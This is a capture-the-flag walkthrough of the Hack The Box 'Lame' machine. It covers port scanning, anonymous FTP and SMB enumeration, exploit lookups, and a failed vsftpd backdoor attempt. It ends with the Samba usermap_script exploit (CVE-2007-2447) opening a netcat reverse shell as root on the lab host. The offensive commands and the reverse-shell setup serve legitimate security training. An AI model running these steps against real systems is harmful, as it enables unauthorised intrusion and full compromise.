Lame

Details:

  • OS: Linux
  • RELEASE DATE: 14 Mar 2017
  • DIFFICULTY: Easy

Enumeration:

export host variables
export RHOST=10.129.229.88
export LHOST=10.10.14.113
nmap target scan
> nmap -sS -sV -sC -p- -oN Lame $RHOST
...
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-07 13:24 BST
Nmap scan report for 10.129.232.239
Host is up (0.0087s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.113
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-06-07T08:27:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m38s, deviation: 2h49m45s, median: 36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.27 seconds

Exploitation:

test anonymous smb login

ncftp
> ncftp -u anonymous $RHOST
...
Connecting to 10.129.232.239...                                                                                               
(vsFTPd 2.3.4)
Logging in...                                                                                                                 
Login successful.
Logged in to 10.129.232.239.                                                                                                  
ncftp / >

# check dir
ncftp / > ls -lha
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..

nothing to see…


lists public shares on that server

smbclient
> smbclient -L $RHOST -U%
...
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

get share details

smbmap
> smbmap -H $RHOST
...
[+] IP: 10.129.232.239:445	Name: hackthebox.gr                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

test anonymous smb login again but this time directly to /tmp where we have rw permissions

smbclient
> smbclient -N //$RHOST/tmp
...
Anonymous login successful
smb: \> ls
...
  .                                   D        0  Fri Jun  7 14:18:44 2024
  ..                                 DR        0  Sat Oct 31 06:33:58 2020
  .ICE-unix                          DH        0  Fri Jun  7 13:20:42 2024
  vmware-root                        DR        0  Fri Jun  7 13:20:51 2024
  .X11-unix                          DH        0  Fri Jun  7 13:21:09 2024
  .X0-lock                           HR       11  Fri Jun  7 13:21:09 2024
  5657.jsvc_up                        R        0  Fri Jun  7 13:21:54 2024
  vgauthsvclog.txt.0                  R     1600  Fri Jun  7 13:20:41 2024

		7282168 blocks of size 1024. 5385892 blocks available

nothing to see…


Get CVE details from the rest of our services:

searchsploit vsftp
> searchsploit vsFTPd 2.3.4
...
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                    | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                       | unix/remote/17491.rb
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit openssh
> searchsploit OpenSSH 4.7p1
...
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                     | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                               | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                 | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                       | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Es | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                     | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                         | linux/remote/45939.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit samba
> searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                       | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)             | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                        | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

testing manual exploit

searchsploit
# load module
> searchsploit -m unix/remote/49757.py
...
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/49757.py

# run script
> python /root/49757.py $RHOST
...
# ...get stucked
^C   [+]Exiting...

switch to metasploit

msfconsole
# search for module
[msf](Jobs:0 Agents:0) >> search vsftpd

Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

# load module
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor

# print options
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> options

# set rhost
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhost <ip_address>

# set payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set payload cmd/unix/interact

# run payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
...
[*] 10.129.232.239:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.232.239:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

does not look so good


Lets try the command injection vulnerability CVE-2007-2447 by using amriunix/CVE-2007-2447

# clone repo
> git clone https://github.com/amriunix/CVE-2007-2447

# met dependencies
> pip3 install --user pysmb

# run netcat on a diffrent terminal
> nc -lnvp 5555
...
Ncat: Listening on 0.0.0.0:5555

# run script
> python3 ./CVE-2007-2447/usermap_script.py $RHOST 139 $LHOST 5555

# on netcat you will see
Ncat: Connection from 10.129.232.239.

# in netcat check
> whoami
...
root #(!)

Conclusion:

simple in retrospect, as always